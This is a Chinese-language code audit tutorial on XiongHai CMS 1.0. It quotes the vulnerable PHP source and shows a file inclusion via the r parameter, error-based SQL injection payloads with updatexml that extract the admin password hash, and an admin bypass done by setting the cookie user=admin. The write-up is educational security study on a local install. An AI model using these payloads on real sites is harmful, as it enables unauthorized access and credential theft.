熊海CMS_1.0 代码审计

　　熊海是一款小型的内容管理系统，1.0版本是多年前的版本了，所以漏洞还是比较多的，而且审计起来难度不大，非常适合入门，所以今天我进行这款cms的代码审计。程序安装后使用seay源代码审计系统打开，首先使用自动审计。

　　可以看到，seay源代码审计工具还是审出了非常多的可疑漏洞的，但是这款工具还是有一定的误报率的。我们需要做的就是可疑漏洞的检查。

0x01 /index.php 的文件包含

　　我们首先检查第一个可疑漏洞，打开/index.php文件：

 <?php
 //单一入口模式
 error_reporting(0); //关闭错误显示
 $file=addslashes($_GET['r']); //接收文件名
 $action=$file==''?'index':$file; //判断为空或者等于index
 include('files/'.$action.'.php'); //载入相应文件
 ?>

　　在第6行，我们可以发现这里存在一个非常明显的文件包含漏洞，参数r没有经过任何过滤直接被include包含。我们在根目录下创建phpinfo.php文件，内容为<?php phpinfo(); ?>，在url里提交?r=../phpinfo，程序添加.php后缀名后产生了文件包含。

　　/admin/index.php也同理存在文件包含漏洞。

 0x02 /admin/files/login.php SQL注入

　　后面的这些漏洞暂时不看，对一个网站来说，后台登陆的安全性需求最高，我们直接来看登陆页面的代码：

 <?php
 ob_start();
 require '../inc/conn.php';
 $login=$_POST['login'];
 $user=$_POST['user'];
 $password=$_POST['password'];
 $checkbox=$_POST['checkbox'];
 
 if ($login<>""){
 $query = "SELECT * FROM manage WHERE user='$user'";
 $result = mysql_query($query) or die('SQL语句有误：'.mysql_error());
 $users = mysql_fetch_array($result);
 
 if (!mysql_num_rows($result)) {
 echo "<Script language=JavaScript>alert('抱歉，用户名或者密码错误。');history.back();</Script>";
 exit;
 }else{
 $passwords=$users['password'];
 if(md5($password)<>$passwords){
 echo "<Script language=JavaScript>alert('抱歉，用户名或者密码错误。');history.back();</Script>";
 exit;
     }
 //写入登录信息并记住30天
 if ($checkbox==1){
 setcookie('user',$user,time()+3600*24*30,'/');
 }else{
 setcookie('user',$user,0,'/');
 }
 echo "<script>this.location='?r=index'</script>";
 exit;
 }
 exit;
 ob_end_flush();
 }
 ?>

　　一段赏心悦目的漏洞，如果所有的网站都这样就不会陷入日站日不动，审计没思路的尴尬局面了。简单看了一眼代码后，企图直接万能密码登陆，登陆的时候发现可以用错误的用户名和正确的密码登陆，如果密码不正确还是不能登陆。黑盒测试失败，继续回来看代码吧...

　　首先程序用post方式接收我们传递的参数，然后未经任何过滤进行了用户名校验，如果用户名存在继续进行密码校验。问题出在代码的第19行，这里首先将我们传递的password变量进行md5散列，然后拿散列值与数据库里面的密码进行核对，这也就是我们不能采用万能密码绕过的原因。不过问题不大这里的sql注入算是石锤了，我们可以通过报错注入来利用这个漏洞。我们提交用户名为：

1' or updatexml(1,concat((select concat(0x7e,password,0x7e) from manage)),0) #

　　成功报错，我们利用返回的md5值查找对应的密码，结果是找不到的，仔细查看原因发现返回的md5值只有27位...所以我们要进行两次报错注入拼接md5值，最终payload：

1' or updatexml(1,concat((select concat(0x7e,password) from manage)),0) #
1' or updatexml(1,concat((select concat(password,0x7e) from manage)),0) #

 0x03 后台的SQL注入

　　成功登陆后台之后我们再查看后台的可疑漏洞，根据自动分析的结果，我们看到了一大堆SQL注入漏洞。一个一个点开看，非常多的变量使用了addslashes进行过滤，这里也不存在gbk和utf-8的编码问题，所以也不用考虑宽字节注入，基本确定属于误报。后面第一个真正的漏洞位于/admin/files/editlink.php，源码如下：

 <?php
 require '../inc/checklogin.php';
 require '../inc/conn.php';
 $linklistopen='class="open"';
 $id=$_GET['id'];
 $query = "SELECT * FROM link WHERE id='$id'";
 $resul = mysql_query($query) or die('SQL语句有误：'.mysql_error());
 $link = mysql_fetch_array($resul);
 
 $save=$_POST['save'];
 $name=$_POST['name'];
 $url=$_POST['url'];
 $mail=$_POST['mail'];
 $jieshao=$_POST['jieshao'];
 $xs=$_POST['xs'];
 if ($xs==""){
 $xs=1;
     }
 
 if ($save==1){
 
 if ($name==""){
 echo "<script>alert('抱歉，链接名称不能为空。');history.back()</script>";
 exit;
 }
 if ($url==""){
 echo "<script>alert('抱歉，链接地址不能为空。');history.back()</script>";
 exit;
 }
 
 $query = "UPDATE link SET
 name='$name',
 url='$url',
 mail='$mail',
 jieshao='$jieshao',
 xs='$xs',
 date=now()
 WHERE id='$id'";
 @mysql_query($query) or die('修改错误：'.mysql_error());
 echo "<script>alert('亲爱的，链接已经成功编辑。');location.href='?r=linklist'</script>";
 exit;
 }
 ?>

　　非常明显还是那个老问题，通过post提交变量，中间没有进行任何过滤直接查询数据库，继续用刚刚的payload吧,漏洞确实存在的，而且后面还有好多处，不挨个写了。

' or updatexml(1,concat((select concat(0x7e,password,0x7e) from manage)),0) or '

0x04 留言板XSS

　　源码审计系统还报了一处位于/seacmseditor/php/controller.php的XSS漏洞，但是这里在输出到浏览器的时候被htmlspecialchars转义成为了html实体，所以说这又是一个误报。但是这套CMS还有一个影响比较严重的XSS没有被扫描出，CMS的前台留言板没有进行XSS过滤，后台管理界面也没有进行过滤，因此产生了存储型XSS，而且有针对性的攻击管理员，属于比较危险的一类XSS了。这里不贴代码了。

0x05 垂直越权

　　自动审计结果还给出了好几个/inc目录下的任意文件读取，挨个打开阅读源码之后并没有发现这个漏洞，倒是checklogin.php存在一个垂直越权漏洞：

 <?php
 $user=$_COOKIE['user'];
 if ($user==""){
 header("Location: ?r=login");
 exit;
 }
 ?>

　　一个判断管理员的程序，如果COOKIE中user参数为空，那么就跳转到登陆窗。这样的话越权就很轻松了，我们访问一个需要管理员权限的页面，例如http://127.0.0.1/xhcms-1.0/admin/?r=editlink，抓包在COOKIE后面添加user=admin即可实现越权。

　　总之这款CMS对新手友好，大家也可以试着玩一下！